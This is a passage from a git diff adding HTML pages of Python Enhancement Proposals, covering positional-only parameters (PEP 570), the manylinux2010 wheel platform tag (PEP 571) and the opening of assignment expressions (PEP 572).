The new syntax will enable library authors to further control how their API +can be called. It will allow designating which parameters must be called as +positional-only, while preventing them from being called as keyword arguments.

+

Previously, (informational) PEP 457 defined the syntax, but with a much more vague +scope. This PEP takes the original proposal a step further by justifying +the syntax and providing an implementation for the / syntax in function +definitions.

+
+

Performance

+

In addition to the aforementioned benefits, the parsing and handling of +positional-only arguments is faster. This performance benefit can be +demonstrated in this thread about converting keyword arguments to positional: +[11]. Due to this speedup, there has been a recent +trend towards moving builtins away from keyword arguments: recently, +backwards-incompatible changes were made to disallow keyword arguments to +bool, float, list, int, tuple.
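The effect is easy to observe; for example (the exact message may vary across CPython versions):

>>> bool(x=1)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: bool() takes no keyword arguments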

+
+
+

Maintainability

+

Providing a way to specify positional-only parameters in Python will make it easier to maintain pure Python implementations of C modules. Additionally, library authors defining functions will have the option of using positional-only parameters if they determine that passing a keyword argument provides no additional clarity.

+

This is a well discussed, recurring topic on the Python mailing lists:

+ +
+
+

Logical ordering

+

Positional-only parameters also have the (minor) benefit of enforcing some +logical order when calling interfaces that make use of them. For example, the +range function takes all its parameters positionally and disallows forms +like:

+
range(stop=5, start=0, step=2)
+range(stop=5, step=2, start=0)
+range(step=2, start=0, stop=5)
+range(step=2, stop=5, start=0)
+
+
+

at the price of disallowing the use of keyword arguments for the (unique) +intended order:

+
range(start=0, stop=5, step=2)
+
+
+
+
+

Compatibility for Pure Python and C Modules

+

Another critical motivation for positional-only parameters is PEP 399: +Pure Python/C Accelerator Module Compatibility Requirements. This +PEP states that:

+
+
This PEP requires that in these instances that the C code must pass the +test suite used for the pure Python code to act as much as a drop-in +replacement as reasonably possible
+

If the C code implements positional-only parameters using the existing capabilities (the argument clinic and related machinery), it is not possible for the pure Python counterpart to match the provided interface and requirements. This creates a disparity between the interfaces of some functions and classes in the CPython standard library and other Python implementations. For example:

+
$ python3 # CPython 3.7.2
+>>> import binascii; binascii.crc32(data=b'data')
+TypeError: crc32() takes no keyword arguments
+
+$ pypy3 # PyPy 6.0.0
+>>>> import binascii; binascii.crc32(data=b'data')
+2918445923
+
+
+

Other Python implementations can reproduce the CPython APIs manually, but this duplication goes against the spirit of PEP 399, which mandates that all modules added to Python’s standard library have a pure Python implementation with the same interface and semantics precisely to avoid such duplication of effort.
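With this PEP, a pure Python binascii.crc32 could declare its parameters positional-only and match the C version exactly; a signature-level sketch (the body is elided):

def crc32(data, crc=0, /):
    # Neither parameter can be passed by keyword, so crc32(data=b'data')
    # now fails identically on every conforming implementation.
    ...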

+
+
+

Consistency in Subclasses

+

Another scenario where positional-only parameters provide benefit occurs when a +subclass overrides a method of the base class and changes the name of parameters +that are intended to be positional:

+
class Base:
+    def meth(self, arg: int) -> str:
+        ...
+
+class Sub(Base):
+    def meth(self, other_arg: int) -> str:
+        ...
+
+def func(x: Base):
+    x.meth(arg=12)
+
+func(Sub())  # Runtime error
+
+
+

This situation could be considered a Liskov violation: the subclass cannot be used in a context where an instance of the base class is expected. Renaming arguments when overriding methods can happen when the subclass has reasons to use a different choice for the parameter name that is more appropriate for the specific domain of the subclass (e.g., when subclassing Mapping to implement a DNS lookup cache, the derived class may not want to use the generic argument names ‘key’ and ‘value’ but rather ‘host’ and ‘address’). Declaring such methods with positional-only parameters avoids this problem because users will not be able to call the interface using keyword arguments. In general, designing for subclassing usually involves anticipating code that hasn’t been written yet and over which the author has no control. Having measures that can facilitate the evolution of interfaces in a backwards-compatible way would be useful for library authors.
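Under this PEP, the base class could declare the parameter positional-only, making the keyword call impossible in the first place; a sketch:

class Base:
    def meth(self, arg: int, /) -> str:
        return str(arg)

class Sub(Base):
    def meth(self, host: int, /) -> str:   # renaming is now safe
        return str(host)

def func(x: Base) -> str:
    return x.meth(12)   # x.meth(arg=12) is no longer expressible

print(func(Sub()))   # 12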

+
+
+

Optimizations

+

A final argument in favor of positional-only parameters is that they allow some new optimizations, like the ones already present in the argument clinic, because parameters are expected to be passed in strict order. For example, CPython’s internal METH_FASTCALL calling convention has recently been specialized for functions with positional-only parameters to eliminate the cost of handling empty keywords. Similar performance improvements can be applied when creating the evaluation frame of Python functions, thanks to positional-only parameters.

+
+
+
+

Specification

+
+

Syntax and Semantics

+

From the “ten-thousand foot view”, eliding *args and **kwargs for +illustration, the grammar for a function definition would look like:

+
def name(positional_or_keyword_parameters, *, keyword_only_parameters):
+
+
+

Building on that example, the new syntax for function definitions would look +like:

+
def name(positional_only_parameters, /, positional_or_keyword_parameters,
+         *, keyword_only_parameters):
+
+
+

The following would apply:

+
    +
  • All parameters left of the / are treated as positional-only.
  • +
  • If / is not specified in the function definition, that function does not +accept any positional-only arguments.
  • +
  • The logic around optional values for positional-only parameters remains the +same as for positional-or-keyword parameters.
  • +
  • Once a positional-only parameter is specified with a default, the +following positional-only and positional-or-keyword parameters need to have +defaults as well.
  • +
  • Positional-only parameters which do not have default +values are required positional-only parameters.
  • +
+

Therefore, the following would be valid function definitions:

+
def name(p1, p2, /, p_or_kw, *, kw):
+def name(p1, p2=None, /, p_or_kw=None, *, kw):
+def name(p1, p2=None, /, *, kw):
+def name(p1, p2=None, /):
+def name(p1, p2, /, p_or_kw):
+def name(p1, p2, /):
+
+
+

Just like today, the following would be valid function definitions:

+
def name(p_or_kw, *, kw):
+def name(*, kw):
+
+
+

While the following would be invalid:

+
def name(p1, p2=None, /, p_or_kw, *, kw):
+def name(p1=None, p2, /, p_or_kw=None, *, kw):
+def name(p1=None, p2, /):
+
+
+
+
+

Full Grammar Specification

+

A simplified view of the proposed grammar specification is:

+
typedargslist:
+  tfpdef ['=' test] (',' tfpdef ['=' test])* ',' '/' [','  # and so on
+
+varargslist:
+  vfpdef ['=' test] (',' vfpdef ['=' test])* ',' '/' [','  # and so on
+
+
+

Based on the reference implementation in this PEP, the new rule for +typedarglist would be:

+
typedargslist: (tfpdef ['=' test] (',' tfpdef ['=' test])* ',' '/' [',' [tfpdef ['=' test] (',' tfpdef ['=' test])* [',' [
+        '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+      | '**' tfpdef [',']]]
+  | '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+  | '**' tfpdef [',']] ] )| (
+   tfpdef ['=' test] (',' tfpdef ['=' test])* [',' [
+        '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+      | '**' tfpdef [',']]]
+ | '*' [tfpdef] (',' tfpdef ['=' test])* [',' ['**' tfpdef [',']]]
+ | '**' tfpdef [','])
+
+
+

and for varargslist would be:

+
varargslist: vfpdef ['=' test ](',' vfpdef ['=' test])* ',' '/' [',' [ (vfpdef ['=' test] (',' vfpdef ['=' test])* [',' [
+        '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+      | '**' vfpdef [',']]]
+  | '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+  | '**' vfpdef [',']) ]] | (vfpdef ['=' test] (',' vfpdef ['=' test])* [',' [
+        '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+      | '**' vfpdef [',']]]
+  | '*' [vfpdef] (',' vfpdef ['=' test])* [',' ['**' vfpdef [',']]]
+  | '**' vfpdef [',']
+)
+
+
+
+
+

Semantic Corner Case

+

The following is an interesting corollary of the specification. +Consider this function definition:

+
def foo(name, **kwds):
+    return 'name' in kwds
+
+
+

There is no possible call that will make it return True. +For example:

+
>>> foo(1, **{'name': 2})
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: foo() got multiple values for argument 'name'
+>>>
+
+
+

But using / we can support this:

+
def foo(name, /, **kwds):
+    return 'name' in kwds
+
+
+

Now the above call will return True.

+

In other words, the names of positional-only parameters can be used in +**kwds without ambiguity. (As another example, this benefits the +signatures of dict() and dict.update().)

+
+
+

Origin of “/” as a Separator

+

Using / as a separator was initially proposed by Guido van Rossum +in 2012 [8] :

+
+
Alternative proposal: how about using ‘/’ ? It’s kind of the opposite +of ‘*’ which means “keyword argument”, and ‘/’ is not a new character.
+
+
+
+

How To Teach This

+

Introducing a dedicated syntax to mark positional-only parameters is closely +analogous to existing keyword-only arguments. Teaching these concepts together +may simplify how to teach the possible function definitions a user may encounter or +design.

+

This PEP recommends adding a new subsection to the Python documentation, in the +section “More on Defining Functions”, where the rest of the argument types +are discussed. The following paragraphs serve as a draft for these additions. +They will introduce the notation for both positional-only and +keyword-only parameters. It is not intended to be exhaustive, nor should it be +considered the final version to be incorporated into the documentation.

+
+

By default, arguments may be passed to a Python function either by position +or explicitly by keyword. For readability and performance, it makes sense to +restrict the way arguments can be passed so that a developer need only look +at the function definition to determine if items are passed by position, by +position or keyword, or by keyword.

+

A function definition may look like:

+
def f(pos1, pos2, /, pos_or_kwd, *, kwd1, kwd2):
+      -----------    ----------     ----------
+        |             |                  |
+        |        Positional or keyword   |
+        |                                - Keyword only
+         -- Positional only
+
+
+

where / and * are optional. If used, these symbols indicate the kind of +parameter by how the arguments may be passed to the function: +positional-only, positional-or-keyword, and keyword-only. Keyword parameters +are also referred to as named parameters.

+
+

Positional-or-Keyword Arguments

+

If / and * are not present in the function definition, arguments may +be passed to a function by position or by keyword.

+
+
+

Positional-Only Parameters

+

Looking at this in a bit more detail, it is possible to mark certain parameters +as positional-only. If positional-only, the parameters’ order matters, and +the parameters cannot be passed by keyword. Positional-only parameters would +be placed before a / (forward-slash). The / is used to logically +separate the positional-only parameters from the rest of the parameters. +If there is no / in the function definition, there are no positional-only +parameters.

+

Parameters following the / may be positional-or-keyword or keyword-only.

+
+
+

Keyword-Only Arguments

+

To mark parameters as keyword-only, indicating the parameters must be passed +by keyword argument, place an * in the arguments list just before the first +keyword-only parameter.

+
+
+

Function Examples

+

Consider the following example function definitions paying close attention to the +markers / and *:

+
>>> def standard_arg(arg):
+...     print(arg)
+...
+>>> def pos_only_arg(arg, /):
+...     print(arg)
+...
+>>> def kwd_only_arg(*, arg):
+...     print(arg)
+...
+>>> def combined_example(pos_only, /, standard, *, kwd_only):
+...     print(pos_only, standard, kwd_only)
+
+
+

The first function definition standard_arg, the most familiar form, +places no restrictions on the calling convention and arguments may be +passed by position or keyword:

+
>>> standard_arg(2)
+2
+
+>>> standard_arg(arg=2)
+2
+
+
+

The second function pos_only_arg is restricted to only use positional +parameters as there is a / in the function definition:

+
>>> pos_only_arg(1)
+1
+
+>>> pos_only_arg(arg=1)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: pos_only_arg() got an unexpected keyword argument 'arg'
+
+
+

The third function kwd_only_arg only allows keyword arguments as indicated by a * in the function definition:

+
>>> kwd_only_arg(3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: kwd_only_arg() takes 0 positional arguments but 1 was given
+
+>>> kwd_only_arg(arg=3)
+3
+
+
+

And the last uses all three calling conventions in the same function +definition:

+
>>> combined_example(1, 2, 3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: combined_example() takes 2 positional arguments but 3 were given
+
+>>> combined_example(1, 2, kwd_only=3)
+1 2 3
+
+>>> combined_example(1, standard=2, kwd_only=3)
+1 2 3
+
+>>> combined_example(pos_only=1, standard=2, kwd_only=3)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: combined_example() got an unexpected keyword argument 'pos_only'
+
+
+
+
+

Recap

+

The use case will determine which parameters to use in the function definition:

+
def f(pos1, pos2, /, pos_or_kwd, *, kwd1, kwd2):
+
+
+

As guidance:

+
    +
  • Use positional-only if names do not matter or have no meaning, and there are +only a few arguments which will always be passed in the same order.
  • +
  • Use keyword-only when names have meaning and the function definition is +more understandable by being explicit with names.
  • +
+
+
+
+

Reference Implementation

+

An initial implementation that passes the CPython test suite is available for +evaluation [10].

+

The benefits of this implementation are the speed of handling positional-only parameters, consistency with the implementation of keyword-only parameters (PEP 3102), and a simpler implementation of all the tools and modules that would be impacted by this change.

+
+
+

Rejected Ideas

+
+

Do Nothing

+

Always an option — the status quo. While this was considered, the +aforementioned benefits are worth the addition to the language.

+
+
+

Decorators

+

It has been suggested on python-ideas [9] to +provide a decorator written in Python for this feature.

+

This approach has the benefit of not polluting the function definition with additional syntax. However, we have decided to reject this idea (a sketch of such a decorator follows the list below) because:

+
    +
  • It introduces an asymmetry with how parameter behavior is declared.
  • +
  • It makes it difficult for static analyzers and type checkers to +safely identify positional-only parameters. They would need to query the AST +for the list of decorators and identify the correct one by name or with extra +heuristics, while keyword-only parameters are exposed +directly in the AST. In order for tools to correctly identify +positional-only parameters, they would need to execute the module to access +any metadata the decorator is setting.
  • +
  • Any error with the declaration will be reported only at runtime.
  • +
  • It may be more difficult to identify positional-only parameters in long +function definitions, as it forces the user to count them to know which is +the last one that is impacted by the decorator.
  • +
  • The / syntax has already been introduced for C functions. This +inconsistency will make it more challenging to implement any tools and +modules that deal with this syntax — including but not limited to, the +argument clinic, the inspect module and the ast module.
  • +
  • The decorator implementation would likely impose a runtime performance cost, +particularly when compared to adding support directly to the interpreter.
  • +
+
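To make the comparison concrete, here is a minimal sketch of what such a (purely hypothetical) decorator might look like; note that it can only enforce the restriction at call time, which is exactly the weakness described above:

import functools

def positional_only(n):
    # Hypothetical decorator: reject keyword use of the first n parameters.
    def decorator(func):
        names = func.__code__.co_varnames[:n]
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            for name in names:
                if name in kwargs:
                    raise TypeError(f"{func.__name__}() got an unexpected keyword argument {name!r}")
            return func(*args, **kwargs)
        return wrapper
    return decorator

@positional_only(2)
def pow_like(base, exp, mod=None):
    return pow(base, exp, mod)

pow_like(2, 10)           # fine
pow_like(base=2, exp=10)  # TypeError, but only at runtime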
+
+

Per-Argument Marker

+

A per-argument marker is another language-intrinsic option. The approach adds +a token to each of the parameters to indicate they are positional-only and +requires those parameters to be placed together. Example:

+
def (.arg1, .arg2, arg3):
+
+
+

Note the dot (i.e., .) on .arg1 and .arg2. While this approach +may be easier to read, it has been rejected because / as an explicit marker +is congruent with * for keyword-only arguments and is less error-prone.

+

It should be noted that some libraries already use leading underscore +[12] to conventionally indicate parameters as positional-only.

+
+
+

Using “__” as a Per-Argument Marker

+

Some libraries and applications (like mypy or jinja) use names +prepended with a double underscore (i.e., __) as a convention to indicate +positional-only parameters. We have rejected the idea of introducing __ as +a new syntax because:

+
    +
  • It is a backwards-incompatible change.
  • +
  • It is not symmetric with how the keyword-only parameters are currently +declared.
  • +
  • Querying the AST for positional-only parameters would require checking the +normal arguments and inspecting their names, whereas keyword-only parameters +have a property associated with them (FunctionDef.args.kwonlyargs).
  • +
  • Every parameter would need to be inspected to know when positional-only +arguments end.
  • +
  • The marker is more verbose, forcing marking every positional-only parameter.
  • +
  • It clashes with other uses of the double underscore prefix like invoking name +mangling in classes.
  • +
+
+
+

Group Positional-Only Parameters With Parentheses

+

Tuple parameter unpacking is a Python 2 feature which allows the use of a tuple +as a parameter in a function definition. It allows a sequence argument to be +unpacked automatically. An example is:

+
def fxn(a, (b, c), d):
+    pass
+
+
+

Tuple argument unpacking was removed in Python 3 (PEP 3113). There has been a +proposition to reuse this syntax to implement positional-only parameters. We +have rejected this syntax for indicating positional only parameters for several +reasons:

+
    +
  • The syntax is asymmetric with respect to how keyword-only parameters are +declared.
  • +
  • Python 2 uses this syntax which could raise confusion regarding the behavior +of this syntax. This would be surprising to users porting Python 2 codebases +that were using this feature.
  • +
  • This syntax is very similar to tuple literals. This can raise additional +confusion because it can be confused with a tuple declaration.
  • +
+
+
+

After Separator Proposal

+

Marking positional-only parameters after the / was another idea considered. However, we were unable to find an approach that would modify only the arguments after the marker; otherwise, it would force the parameters before the marker to be positional-only as well. For example:

+
def (x, y, /, z):
+
+
+

If we define that / marks z as positional-only, it would not be +possible to specify x and y as keyword arguments. Finding a way to +work around this limitation would add confusion given that at the moment +keyword arguments cannot be followed by positional arguments. Therefore, / +would make both the preceding and following parameters positional-only.

+
+
+
+

Thanks

+

Credit for some of the content of this PEP is contained in Larry Hastings’s +PEP 457.

+

Credit for the use of / as the separator between positional-only and positional-or-keyword parameters goes to Guido van Rossum, in a proposal from 2012. [8]

+

Credit for discussion about the simplification of the grammar goes to +Braulio Valdivieso.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0570.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0571/index.html b/pep-0571/index.html new file mode 100644 index 00000000000..d38e53a1732 --- /dev/null +++ b/pep-0571/index.html @@ -0,0 +1,582 @@ PEP 571 – The manylinux2010 Platform Tag | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 571 – The manylinux2010 Platform Tag

+
+
Author:
+
Mark Williams <mrw at enotuniq.org>, +Geoffrey Thomas <geofft at ldpreload.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
05-Feb-2018
+
Post-History:
+

+
Superseded-By:
+
600
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the creation of a manylinux2010 platform tag to +succeed the manylinux1 tag introduced by PEP 513. It also +proposes that PyPI and pip both be updated to support uploading, +downloading, and installing manylinux2010 distributions on compatible +platforms.

+
+
+

Rationale

+

True to its name, the manylinux1 platform tag has made the +installation of binary extension modules a reality on many Linux +systems. Libraries like cryptography [2] and numpy [3] are +more accessible to Python developers now that their installation on +common architectures does not depend on fragile development +environments and build toolchains.

+

manylinux1 wheels achieve their portability by allowing the extension modules they contain to link against only a small set of system-level shared libraries that export versioned symbols old enough to benefit from backwards-compatibility policies. Extension modules in a manylinux1 wheel that rely on glibc, for example, must be built against version 2.5 or earlier; they may then be run on systems that provide a more recent glibc version, as long as it still exports the required symbols at version 2.5.

+

PEP 513 drew its whitelisted shared libraries and their symbol +versions from CentOS 5.11, which was the oldest supported CentOS +release at the time of its writing. Unfortunately, CentOS 5.11 +reached its end-of-life on March 31st, 2017 with a clear warning +against its continued use. [4] No further updates, such as security +patches, will be made available. This means that its packages will +remain at obsolete versions that hamper the efforts of Python software +packagers who use the manylinux1 Docker image.

+

CentOS 6 is now the oldest supported CentOS release, and will receive +maintenance updates through November 30th, 2020. [5] We propose that +a new PEP 425-style platform tag called manylinux2010 be derived +from CentOS 6 and that the manylinux toolchain, PyPI, and pip +be updated to support it.

+

This was originally proposed as manylinux2, but the versioning has +been changed to use calendar years (also known as CalVer [22]). This +makes it easier to define future manylinux tags out of order: for +example, a hypothetical manylinux2017 standard may be defined via +a new PEP before manylinux2014, or a manylinux2007 standard +might be defined that targets systems older than this PEP but newer +than manylinux1.

+

Calendar versioning also gives a rough idea of which Linux +distribution versions support which tag: manylinux2010 will work +on most distribution versions released since 2010. This is only an +approximation, however: the actual compatibility rules are defined +below, and some newer distributions may not meet them.

+
+
+

The manylinux2010 policy

+

The following criteria determine a linux wheel’s eligibility for +the manylinux2010 tag:

+
    +
  1. The wheel may only contain binary executables and shared objects +compiled for one of the two architectures supported by CentOS 6: +x86_64 or i686. [5]
  2. The wheel’s binary executables or shared objects may not link against externally-provided libraries except those in the following whitelist:
    libgcc_s.so.1
    +libstdc++.so.6
    +libm.so.6
    +libdl.so.2
    +librt.so.1
    +libc.so.6
    +libnsl.so.1
    +libutil.so.1
    +libpthread.so.0
    +libresolv.so.2
    +libX11.so.6
    +libXext.so.6
    +libXrender.so.1
    +libICE.so.6
    +libSM.so.6
    +libGL.so.1
    +libgobject-2.0.so.0
    +libgthread-2.0.so.0
    +libglib-2.0.so.0
    +
    +
    +

    This list is identical to the externally-provided libraries +whitelisted for manylinux1, minus libncursesw.so.5 and +libpanelw.so.5. [7] libpythonX.Y remains ineligible for +inclusion for the same reasons outlined in PEP 513.

    +

    libcrypt.so.1 was retrospectively removed from the whitelist after +Fedora 30 was released with libcrypt.so.2 instead.

    +

    On Debian-based systems, these libraries are provided by the packages:

    Package         Libraries
    libc6           libdl.so.2, libresolv.so.2, librt.so.1, libc.so.6, libpthread.so.0, libm.so.6, libutil.so.1, libnsl.so.1
    libgcc1         libgcc_s.so.1
    libgl1          libGL.so.1
    libglib2.0-0    libgobject-2.0.so.0, libgthread-2.0.so.0, libglib-2.0.so.0
    libice6         libICE.so.6
    libsm6          libSM.so.6
    libstdc++6      libstdc++.so.6
    libx11-6        libX11.so.6
    libxext6        libXext.so.6
    libxrender1     libXrender.so.1
    +

    On RPM-based systems, they are provided by these packages:

    Package       Libraries
    glib2         libglib-2.0.so.0, libgthread-2.0.so.0, libgobject-2.0.so.0
    glibc         libresolv.so.2, libutil.so.1, libnsl.so.1, librt.so.1, libpthread.so.0, libdl.so.2, libm.so.6, libc.so.6
    libICE        libICE.so.6
    libX11        libX11.so.6
    libXext       libXext.so.6
    libXrender    libXrender.so.1
    libgcc        libgcc_s.so.1
    libstdc++     libstdc++.so.6
    mesa          libGL.so.1
    +
  3. If the wheel contains binary executables or shared objects linked against any whitelisted libraries that also export versioned symbols, they may only depend on the following maximum versions:
    GLIBC_2.12
    +CXXABI_1.3.3
    +GLIBCXX_3.4.13
    +GCC_4.5.0
    +
    +
    +

    As an example, manylinux2010 wheels may include binary artifacts that require glibc symbols at version GLIBC_2.4, because this is an earlier version than the maximum of GLIBC_2.12.

    +
  4. If a wheel is built for any version of CPython 2 or CPython versions 3.0 up to and including 3.2, it must include a CPython ABI tag indicating its Unicode ABI. A manylinux2010 wheel built against Python 2, then, must include either the cp27mu tag, indicating it was built against an interpreter with the UCS-4 ABI, or the cp27m tag, indicating an interpreter with the UCS-2 ABI. (PEP 3149, [9])
  5. A wheel must not require the PyFPE_jbuf symbol. This is achieved by building it against a Python compiled without the --with-fpectl configure flag.
+
+
+

Compilation of Compliant Wheels

+

Like manylinux1, the auditwheel tool adds manylinux2010 +platform tags to linux wheels built by pip wheel or +bdist_wheel in a manylinux2010 Docker container.

+
+

Docker Image

+

Two manylinux2010 Docker images based on CentOS 6 are provided for building binary linux wheels that can reliably be converted to manylinux2010 wheels. [10] The x86_64 and i686 images come with a new compiler suite installed (gcc, g++, and gfortran from devtoolset-8) as well as the latest releases of Python and pip.

+
+

Compatibility with kernels that lack vsyscall

+

A Docker container assumes that its userland is compatible with its +host’s kernel. Unfortunately, an increasingly common kernel +configuration breaks this assumption for x86_64 CentOS 6 Docker +images.

+

Versions 2.14 and earlier of glibc require the kernel provide an +archaic system call optimization known as vsyscall on x86_64. [11] +To effect the optimization, the kernel maps a read-only page of +frequently-called system calls – most notably time(2) – into +each process at a fixed memory location. glibc then invokes these +system calls by dereferencing a function pointer to the appropriate +offset into the vsyscall page and calling it. This avoids the +overhead associated with invoking the kernel that affects normal +system call invocation. vsyscall has long been deprecated in +favor of an equivalent mechanism known as vDSO, or “virtual dynamic +shared object”, in which the kernel instead maps a relocatable virtual +shared object containing the optimized system calls into each +process. [12]

+

The vsyscall page has serious security implications because it does not participate in address space layout randomization (ASLR). Its predictable location and contents make it a useful source of gadgets used in return-oriented programming attacks. [13] At the same time, its elimination breaks the x86_64 ABI, because glibc versions that depend on vsyscall suffer from segmentation faults when attempting to dereference a system call pointer into a non-existent page. As a compromise, Linux 3.1 implemented an “emulated” vsyscall that reduced the executable code, and thus the material for ROP gadgets, mapped into the process. [14] vsyscall=emulated has been the default configuration in most distributions’ kernels for many years.

+

Unfortunately, vsyscall emulation still exposes predictable code +at a reliable memory location, and continues to be useful for +return-oriented programming. [15] Because most distributions have now +upgraded to glibc versions that do not depend on vsyscall, +they are beginning to ship kernels that do not support vsyscall at +all. [16]

+

CentOS 5.11 and 6 both include versions of glibc that depend on the vsyscall page (2.5 and 2.12.2 respectively), so containers based on either cannot run under kernels provided with many distributions’ upcoming releases. [17] If Travis CI, for example, begins running jobs under a kernel that does not provide the vsyscall interface, Python packagers will not be able to use our Docker images there to build manylinux wheels. [18]

+

We have derived a patch from the glibc git repository that backports the removal of all dependencies on vsyscall to the version of glibc included with our manylinux2010 image. [19] Rebuilding glibc, and thus building the manylinux2010 image itself, still requires a host kernel that provides the vsyscall mechanism, but the resulting image can run both on hosts that provide it and on hosts that do not. Because the vsyscall interface is an optimization that is only applied to running processes, the manylinux2010 wheels built with this modified image should be identical to those built on an unmodified CentOS 6 system. Also, the vsyscall problem applies only to x86_64; it is not part of the i686 ABI.

+
+
+
+

Auditwheel

+

The auditwheel tool has also been updated to produce +manylinux2010 wheels. [20] Its behavior and purpose are otherwise +unchanged from PEP 513.

+
+
+
+

Platform Detection for Installers

+

Platforms may define a manylinux2010_compatible boolean attribute on +the _manylinux module described in PEP 513. A platform is +considered incompatible with manylinux2010 if the attribute is +False.

+

If the _manylinux module is not found, or it does not have the attribute +manylinux2010_compatible, tools may fall back to checking for glibc. If the +platform has glibc 2.12 or newer, it is assumed to be compatible unless the +_manylinux module says otherwise.

+

Specifically, the algorithm we propose is:

+
def is_manylinux2010_compatible():
+    # Only Linux, and only x86-64 / i686
+    from distutils.util import get_platform
+    if get_platform() not in ["linux-x86_64", "linux-i686"]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+        return bool(_manylinux.manylinux2010_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 6 uses glibc 2.12.
+    # PEP 513 contains an implementation of this function.
+    return have_compatible_glibc(2, 12)
+
+
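For reference, a condensed sketch of have_compatible_glibc, adapted from the implementation given in PEP 513 (it queries glibc through ctypes):

import ctypes

def have_compatible_glibc(major, minimum_minor):
    try:
        process_namespace = ctypes.CDLL(None)
        gnu_get_libc_version = process_namespace.gnu_get_libc_version
    except (OSError, AttributeError):
        return False  # the symbol is missing: not linked against glibc
    # gnu_get_libc_version returns a string like "2.12".
    gnu_get_libc_version.restype = ctypes.c_char_p
    version_str = gnu_get_libc_version()
    if not isinstance(version_str, str):
        version_str = version_str.decode("ascii")
    version = [int(piece) for piece in version_str.split(".")]
    return version[0] == major and version[1] >= minimum_minor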
+
+
+

Backwards compatibility with manylinux1 wheels

+

As explained in PEP 513, the specified symbol versions for +manylinux1 whitelisted libraries constitute an upper bound. The +same is true for the symbol versions defined for manylinux2010 in +this PEP. As a result, manylinux1 wheels are considered +manylinux2010 wheels. A pip that recognizes the manylinux2010 +platform tag will thus install manylinux1 wheels for +manylinux2010 platforms – even when explicitly set – when no +manylinux2010 wheels are available. [21]

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux2010 platform tag +to be uploaded in the same way that it permits manylinux1. It +should not attempt to verify the compatibility of manylinux2010 +wheels.

+
+
+

Summary of changes to PEP 571

+

The following changes were made to this PEP based on feedback received after +it was approved:

+
    +
  • The maximum version symbol of libgcc_s was updated from GCC_4.3.0 to GCC_4.5.0 to address 32-bit CentOS 6. This doesn’t affect x86_64, because libgcc_s for x86_64 gained no additional symbols between GCC_4.3.0 and GCC_4.5.0.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0571.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0572/index.html b/pep-0572/index.html new file mode 100644 index 00000000000..7a4aff9cd53 --- /dev/null +++ b/pep-0572/index.html @@ -0,0 +1,1474 @@ PEP 572 – Assignment Expressions | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 572 – Assignment Expressions

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>, Tim Peters <tim.peters at gmail.com>, +Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Feb-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, +25-Apr-2018, 09-Jul-2018, 05-Aug-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal for creating a way to assign to variables within an +expression using the notation NAME := expr.

+

As part of this change, there is also an update to dictionary comprehension +evaluation order to ensure key expressions are executed before value +expressions (allowing the key to be bound to a name and then re-used as part of +calculating the corresponding value).

+

During discussion of this PEP, the operator became informally known as +“the walrus operator”. The construct’s formal name is “Assignment Expressions” +(as per the PEP title), but they may also be referred to as “Named Expressions” +(e.g. the CPython reference implementation uses that name internally).

+
+
+

Rationale

+

Naming the result of an expression is an important part of programming, +allowing a descriptive name to be used in place of a longer expression, +and permitting reuse. Currently, this feature is available only in +statement form, making it unavailable in list comprehensions and other +expression contexts.

+

Additionally, naming sub-parts of a large expression can assist an interactive +debugger, providing useful display hooks and partial results. Without a way to +capture sub-expressions inline, this would require refactoring of the original +code; with assignment expressions, this merely requires the insertion of a few +name := markers. Removing the need to refactor reduces the likelihood that +the code be inadvertently changed as part of debugging (a common cause of +Heisenbugs), and is easier to dictate to another programmer.

+
+

The importance of real code

+

During the development of this PEP many people (supporters and critics +both) have had a tendency to focus on toy examples on the one hand, +and on overly complex examples on the other.

+

The danger of toy examples is twofold: they are often too abstract to +make anyone go “ooh, that’s compelling”, and they are easily refuted +with “I would never write it that way anyway”.

+

The danger of overly complex examples is that they provide a +convenient strawman for critics of the proposal to shoot down (“that’s +obfuscated”).

+

Yet there is some use for both extremely simple and extremely complex +examples: they are helpful to clarify the intended semantics. +Therefore, there will be some of each below.

+

